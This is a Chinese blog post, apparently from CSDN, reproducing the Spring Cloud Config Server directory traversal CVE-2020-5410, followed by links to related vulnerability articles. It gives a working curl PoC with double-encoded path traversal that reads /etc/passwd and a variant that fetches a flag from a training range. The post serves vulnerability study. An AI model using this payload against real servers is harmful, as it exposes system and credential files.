spring cloud config server目录遍历漏洞 CVE-2020-5410

最新推荐文章于 2023-08-28 18:30:00 发布

koalayufei

最新推荐文章于 2023-08-28 18:30:00 发布

阅读量461

点赞数

分类专栏：漏洞复现文章标签： java spring 后端 Powered by 金山文档

本文链接：https://blog.csdn.net/weixin_47267061/article/details/129437795

版权

漏洞复现专栏收录该内容

1 篇文章 0 订阅

订阅专栏

一、漏洞简介

Spring Cloud Config，2.2.3之前的2.2.x版本，2.1.9之前的2.1.x版本以及较旧的不受支持的版本允许应用程序通过spring-cloud-config-server模块提供任意配置文件。恶意用户或攻击者可以使用特制URL发送请求，这可能导致目录遍历攻击。

二、影响版本

Spring Cloud Config: 2.2.0 to 2.2.2

Spring Cloud Config: 2.1.0 to 2.1.8

三、漏洞环境&漏洞复现

PoC:

curl "vulnerablemachine:port/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development"

四靶场地址

封神台

poc

http://[靶场url]/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fflag.txt%23foo/development%22

获得flag

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

koalayufei

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
spring cloud config server目录遍历漏洞 CVE-2020-5410

Spring Cloud Config 目录穿越漏洞(CVE-2020-5410)复现
复制链接

扫一扫

专栏目录

Spring框架中文件目录遍历漏洞 Directory traversal in Spring framework

BearFinn的博客

04-24

3032

Spring框架中文件目录遍历漏洞 Directory traversal in Spring framework 官方给出的描述是Spring框架中报告了一个与静态资源处理相关的目录遍历漏洞。某些URL在使用前未正确加密，使得攻击者能够获取文件系统上的任何文件，这些文件也可用于运行SpringWeb应用程序的进程。受影响的版本: Spring Framework 3.0.4 to 3.2.11...

Apache Flink目录遍历(CVE-2020-17519)批量检测脚本

09-24

2021年1月5日，Apache Flink官方发布安全更新，修复了由蚂蚁安全非攻实验室发现提交的2个高危漏洞，漏洞之一就是Apache Flink目录遍历漏洞(CVE-2020-17519)。 Flink核心是一个流式的数据流执行引擎，其针对数据流的...

参与评论您还未登录，请先登录后发表或查看评论

Spring Cloud Config目录遍历漏洞(CVE-2019-3799)

Li-D的博客

09-16

2410

漏洞描述 Spring Cloud Config目录遍历漏洞的本质是允许应用程序通过spring-cloud-config-server模块获取任意配置文件。攻击者可以构建恶意URL以利用目录遍历漏洞。漏洞危害由于spring-cloud-config-server模块未对传入路径进行安全限制，攻击者可以利用多个…%252f进行目录遍历，查看服务器其他路径的敏感文件，造成敏感信息泄露。漏洞影响版本 Spring Cloud Config 2.1.0 to 2.1.1 Spring Cloud Conf

CVE-2020-5410: Spring Cloud Config Server 目录遍历漏洞通告

爱国小白帽

06-03

2377

CVE-2020-5410: Spring Cloud Config Server 目录遍历漏洞通告 360-CERT [三六零CERT](javascript:void(0)???? 昨天 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-HwKUmigU-1591180764214)(https://mmbiz.qpic.cn/mmbiz_jpg/Ic3Rgfdm96f3TFLd7feDIDR9fSLfwvia5uVr9YcNbGcyssibBJCUGb253Z0D64Xbf

Spring Cloud Config 目录穿越漏洞(CVE-2020-5410)复现

thelostworld

02-20

1885

Spring Cloud Config 目录穿越漏洞 (CVE-2020-5410) 一、漏洞简介 Spring Cloud Config，2.2.3之前的2.2.x版本，2.1.9之前的2.1.x版本以及较旧的不受支持的版本允许应用程序通过spring-cloud-config-server模块提供任意配置文件。恶意用户或攻击者可以使用特制URL发送请求，这可能导致目录遍历攻击。二、影响版本 Spring Cloud Config: 2.2.0 to 2.2.2 Spring Cl..

Spring 目录遍历 (CVE-2020-5410)~vulfocus/spring-cve_2020_5410:latest

qq_34341458的博客

04-11

4041

0x01 描述 Spring Cloud Config是美国威睿（VMware）公司的一套分布式系统的配置管理解决方案。该产品主要为分布式系统中的外部配置提供服务器和客户端支持。 Spring Cloud Config，2.2.3之前的2.2.x版本，2.1.9之前的2.1.x版本以及较旧的不受支持的版本允许应用程序通过spring-cloud-config-server模块提供任意配置文件。恶意用户或攻击者可以使用特制URL发送请求，这可能导致目录遍历攻击。 0x02 靶场地址靶场地址:http://v

【漏洞复现-spring-目录遍历】vulfocus/spring-cve_2020_5410

10-15

1330

【spring-目录遍历】

Apache Flink目录遍历(CVE-2020-17519)单目标检测工具

09-24

cve-2020-14750.zip9（补丁升级）

05-26

2020年11月2日，Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750，此漏洞可以在没有身份验证的情况下进行远程攻击，也就是说，可以在不需要用户名和密码的情况下通过网络...

CVE-2020-15778漏洞-——快速升级——openssh8.6.p1.tar.gz

06-21

OpenSSH 命令注入漏洞(CVE-2020-15778),文件包含installs.sh、openssh-8.6p1.tar.gz、openssl-1.1.1k.tar.gz、zlib-1.2.11.tar.gz。升级时候将openssh.tar.gz放至/home下解压，进入openssh目录，执行chmod +x ...

OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令

03-31

本篇将详细讨论如何修补OpenSSH中的几个已知漏洞，包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。首先，让我们了解这些特定的漏洞： 1. CVE-2020-15778：这是一个与OpenSSH密钥协商过程相关的漏洞，可能...

Spring Boot存在路径遍历漏洞CVE-2021-22118

最新发布

日拱一卒无有尽，功不唐捐终入海

08-28

1131

背景：Spring Boot存在路径遍历漏洞。官方 issue也有对此的记录，感兴趣可以看下CVE-2021-22118 是一个在 Spring Boot 中发现的漏洞。该漏洞关系到 Spring Boot 的开发者工具（Devtools）中的远程更新（Remote Update）功能。在某些情况下，攻击者可能会利用这个功能进行目录遍历攻击，从而访问到系统中的敏感文件。远程更新功能被开启（spring.devtools.restart.enabled = true）。

爆肝！！包含复现流程、部分exp、poc和编码小脚本的11个Spring漏洞复现合集

qq_43606723的博客

07-31

1590

这篇包含复现流程、部分exp、poc、加工小脚本和小心得的11个Spring漏洞复现合集是我与shmily师傅利用hvv前的空余时间复现、编写出来的。希望能简化大家开始着手系统性学习Spring框架的繁琐流程，提升学习效率。文章内容如有不妥和错误，请大佬们斧正。...

Spring 目录遍历（CVE-2020-5410 ）复现

YouthBelief的博客

11-03

969

Spring 目录遍历（CVE-2020-5410 ） Spring 目录遍历（CVE-2020-5410 ）0x01 漏洞描述0x02 影响范围0x03 漏洞复现0x04 漏洞修复 Spring 目录遍历（CVE-2020-5410 ） 0x01 漏洞描述 Spring Cloud Config是美国威睿（VMware）公司的一套分布式系统的配置管理解决方案。该产品主要为分布式系统中的外部配置提供服务器和客户端支持。 Spring Cloud Config，2.2.3之前的2.2.x版本，2.1.9

eclipse中文件读取路径默认在_Spring Cloud Config Server 路径穿越与任意文件读取漏洞分析【CVE20193799】...

weixin_35143455的博客

12-18

246

漏洞公告https://pivotal.io/security/cve-2019-3799漏洞复现环境搭建：https://github.com/spring-cloud/spring-cloud-config#quick-startGET /foo/default/master/..%252F..%252F..%252F..%252Fetc%252fpasswd HTTP/1.1Hos...

Vulfocus-Spring 目录遍历（CVE-2020-5410 ）

qq_41819939的博客

07-29

496

SpringCloudConfig是美国威睿（VMware）公司的一套分布式系统的配置管理解决方案。SpringCloudConfig，2.2.3之前的2.2.x版本，2.1.9之前的2.1.x版本以及较旧的不受支持的版本允许应用程序通过spring-cloud-config-server模块提供任意配置文件。恶意用户或攻击者可以使用特制URL发送请求，这可能导致目录遍历攻击。SpringCloudConfig，2.2.3之前的2.2.x版本，2.1.9之前的2.1.x版本。...

Spring 框架相关漏洞详解合集

zjjcchina的博客

01-19

4229

虽说是 Spring 框架漏洞，但以下包含并不仅 Spring Framework，Spring Boot，还有 Spring Cloud，Spring Data，Spring Security 等。 CVE-2010-1622 Spring Framework class.classLoader 类远程代码执行影响版本：SpringSource Spring Framework 3.0.0 - 3.0.2、SpringSource Spring Framework 2.5.0 - 2.5.7

[Vulfocus解题系列] Spring 目录遍历（CVE-2020-5410 ）

00勇士王子的博客

07-13

2464

漏洞介绍名称: Spring 目录遍历（CVE-2020-5410 ）描述: Spring Cloud Config是美国威睿（VMware）公司的一套分布式系统的配置管理解决方案。该产品主要为分布式系统中的外部配置提供服务器和客户端支持。 Spring Cloud Config，2.2.3之前的2.2.x版本，2.1.9之前的2.1.x版本以及较旧的不受支持的版本允许应用程序通过spring-cloud-config-server模块提供任意配置文件。恶意用户或攻击者可以使用特制URL发送请求，这可

详细介绍一下tomcat的目录遍历漏洞（CVE-2020-1938）

04-29

Tomcat 目录遍历漏洞（CVE-2020-1938）是一种文件包含漏洞，影响 Apache Tomcat 服务器的 AJP 协议。 AJP 协议（Apache JServ Protocol）是 Apache HTTP Server 与 Tomcat 之间通信的一种协议，可以通过 mod_jk、mod_proxy_ajp 或 mod_cluster 等模块使用。攻击者可以通过发送恶意请求，利用该漏洞读取远程服务器上的任意文件，包括敏感配置文件、源代码等。漏洞的原理是，攻击者在请求中添加特殊的 AJP 协议数据包，伪装成合法的请求，欺骗 Tomcat 服务器将任意文件作为响应返回。该漏洞影响 Apache Tomcat 9.0.0.M1 到 9.0.31、8.5.0 到 8.5.51、7.0.0 到 7.0.100 版本，已经被评为“高危”漏洞。为了修复该漏洞，可以升级到 Tomcat 9.0.32、8.5.52 或 7.0.100 以上版本。如果不能立即升级，也可以在 AJP 协议前面添加一个安全网关（如 Web 服务器或反向代理服务器），或者关闭 AJP 协议。